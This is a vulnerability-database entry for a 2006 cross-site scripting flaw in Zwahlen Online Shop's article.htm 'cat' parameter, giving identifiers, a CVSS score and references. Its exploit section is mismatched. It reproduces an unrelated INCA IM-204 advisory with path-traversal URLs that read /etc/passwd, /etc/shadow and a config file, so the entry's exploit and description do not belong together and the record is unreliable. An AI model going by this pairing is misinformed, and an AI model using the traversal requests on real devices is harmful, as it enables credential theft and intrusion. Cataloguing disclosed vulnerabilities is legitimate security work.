Zwahlen's Online Shop 'article.htm' cat Parameter Cross-Site Scripting Vulnerability

Vulnerability ID: 1111356    Vulnerability type: Cross-site scripting
Published: 2006-10-23    Updated: 2007-07-06
CVE ID: CVE-2006-5512    CNNVD ID: CNNVD-200610-425
Platform: Hardware    CVSS score: 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/28848
https://www.securityfocus.com/bid/20682
https://cxsecurity.com/issue/WLB-2006100135
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-425
|Vulnerability details
A cross-site scripting vulnerability exists in article.htm of Zwahlen Online Shop; remote attackers can inject arbitrary web script or HTML via the cat parameter.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/20696/info

INCA IM-204 devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input.

Exploiting this issue allows remote, unauthenticated attackers to gain access to potentially sensitive configuration information from affected devices. This may aid them in further attacks.

This BID may be related to BID 20689; the issues are very similar in nature.

http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/passwd
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/shadow
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/config.xml
|Affected products
Zwahlen Informatik Online Shop 5.2.2
|References

Source: BUGTRAQ
Name: 20061022 XSS in Zwahlen Online Shop
Link: http://www.securityfocus.com/archive/1/archive/1/449467/100/0/threaded
Source: XF
Name: zwahlen-article-xss(29753)
Link: http://xforce.iss.net/xforce/xfdb/29753
Source: BID
Name: 20682
Link: http://www.securityfocus.com/bid/20682
Source: SREASON
Name: 1773
Link: http://securityreason.com/securityalert/1773
Source: VIM
Name: 20061103 Zwahlen Online Shop
Link: http://attrition.org/pipermail/vim/2006-November/001106.html